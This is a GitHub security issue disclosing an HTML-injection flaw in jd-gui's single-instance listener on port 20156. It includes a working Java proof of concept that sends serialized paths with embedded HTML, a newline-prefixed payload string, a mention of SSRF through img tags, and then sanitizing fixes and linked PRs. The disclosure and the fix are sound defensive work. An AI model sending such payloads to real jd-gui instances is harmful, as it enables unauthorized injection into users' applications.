java-decompiler / jd-gui

A standalone Java Decompiler GUI
GNU General Public License v3.0

[Security] Deserialize to Swing XSS #416

Closed Y4tacker closed 1 year ago

Y4tacker commented 1 year ago

Vulnerability Analysis

When somebody sets UIMainWindowPreferencesProvider.singleInstance to true in jd-gui.cfg, the InterProcessCommunicationUtil class will be called.

image

Let's check it. It opens a listener on the fixed port 20156 (if the IP is exposed to the public network or is accessible between intranets, it may be affected when using jd-gui) to deserialize the incoming data, and the deserialized data is then passed to the function org.jd.gui.controller.MainController#openFiles for processing.

image

In org.jd.gui.controller.MainController#openFiles, if errors is not empty, it calls JOptionPane.showMessageDialog.

image

We know the jd-gui tool is built with Swing components, so if we can control the data we can insert some HTML code. Let's test it:

import java.io.BufferedOutputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.net.Socket;

public class Test {
    public static void main(String[] args) throws IOException {
        // A String[] is what openFiles() expects; the entry is a path that does not exist
        String[] strings = {"no file<html>123</html>"};

        // Serialize the array the same way InterProcessCommunicationUtil will deserialize it
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(strings);
        oos.close();

        try {
            // Connect to the local single-instance listener on the fixed port
            Socket socket = new Socket("127.0.0.1", 20156);

            BufferedOutputStream bufferedOutputStream = new BufferedOutputStream(socket.getOutputStream());
            bufferedOutputStream.write(barr.toByteArray());
            bufferedOutputStream.flush();
            socket.close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

In this case, we found that the inserted HTML code was not rendered.

image

After reading the code, we found that the HTML tags need to be at the start of a line to work, so we can try to insert a line break:

String[] strings = {"/\n\n\n\n<html><body><h1 color='red'>Hacked By Y4tacker</h1></body></html>"};

Then the HTML tags are successfully rendered:

image

So, since we can render any HTML tag, it stands to reason that we can use the src attribute of the img tag to achieve SSRF.

Recommendations

In org.jd.gui.controller.MainController#openFiles:

image

The return value of file.getAbsolutePath() should be made harmless by removing the newline (\n) character or removing HTML tags from it.
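The recommendation above, worked through as an added example; this is not code from the jd-gui project or from the reporter. The "Unable to open: " message prefix, the class and method names, and the payload string are assumptions made for the example. It shows why the line break matters (JOptionPane turns every line of a String message into its own JLabel, and a JLabel whose text begins with <html> is rendered as HTML), a sanitizer that removes both the line breaks and the angle brackets, a check that confirms no line of the final message would be treated as HTML, and an alternative that avoids the problem by passing a plain-text component instead of a String.

```java
import java.awt.GraphicsEnvironment;
import javax.swing.JOptionPane;
import javax.swing.JTextArea;
import javax.swing.plaf.basic.BasicHTML;

/**
 * Added example, not jd-gui project code: two ways to keep an untrusted
 * file path from being interpreted as HTML when it is shown in a Swing dialog.
 */
public final class SafeErrorDialog {

    private SafeErrorDialog() {}

    /**
     * Option 1, the report's recommendation applied to a String message:
     * drop CR/LF so the path can never start a fresh dialog line, and drop
     * the angle brackets so no line can begin with "<html>". Removing the two
     * characters outright is simpler to reason about than stripping tags.
     */
    public static String sanitizePath(String path) {
        return path.replace("\r", "")
                   .replace("\n", "")
                   .replace("<", "")
                   .replace(">", "");
    }

    /** Build an error list in the assumed "one line per failed path" shape. */
    public static String buildMessage(String[] paths) {
        StringBuilder errors = new StringBuilder();
        for (String p : paths) {
            errors.append("Unable to open: ").append(sanitizePath(p)).append('\n');
        }
        return errors.toString();
    }

    /**
     * Check: would Swing treat any line of this message as HTML? JOptionPane
     * splits a String message on '\n' and gives each piece its own JLabel, and
     * BasicHTML.isHTMLString is the test a JLabel applies to its text.
     */
    public static boolean anyLineIsHtml(String message) {
        for (String line : message.split("\n")) {
            if (BasicHTML.isHTMLString(line)) {
                return true;
            }
        }
        return false;
    }

    /**
     * Option 2, independent of the text content: JOptionPane adds a Component
     * message as-is instead of splitting it into JLabels, and a JTextArea only
     * ever displays plain text, so nothing in the path can be rendered as HTML.
     */
    public static void showPlainTextDialog(String message) {
        JTextArea area = new JTextArea(message);
        area.setEditable(false);
        JOptionPane.showMessageDialog(null, area, "Errors", JOptionPane.ERROR_MESSAGE);
    }

    public static void main(String[] args) {
        // Constructed payload shaped like the report's second test string
        String hostile = "/\n\n\n\n<html><body><h1>injected</h1></body></html>";

        String unsafe = "Unable to open: " + hostile + "\n";
        String safe = buildMessage(new String[] { hostile, "/tmp/ok.jar" });

        System.out.println("unsanitized message contains an HTML line: " + anyLineIsHtml(unsafe));
        System.out.println("sanitized message contains an HTML line:   " + anyLineIsHtml(safe));

        // Only pop a dialog where a display exists; the checks above run headless
        if (!GraphicsEnvironment.isHeadless()) {
            showPlainTextDialog(safe);
        }
    }
}
```

Run headless, the two prints show true for the unsanitized message and false for the sanitized one. Option 2 is the more robust fix, because it does not depend on remembering to sanitize every value that ends up in the message; if a JLabel is required rather than a JTextArea, setting the label's "html.disable" client property to Boolean.TRUE turns off HTML interpretation for that label.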

4ra1n commented 1 year ago

https://github.com/java-decompiler/jd-gui/pull/417

4ra1n commented 1 year ago

https://github.com/java-decompiler/jd-gui/pull/418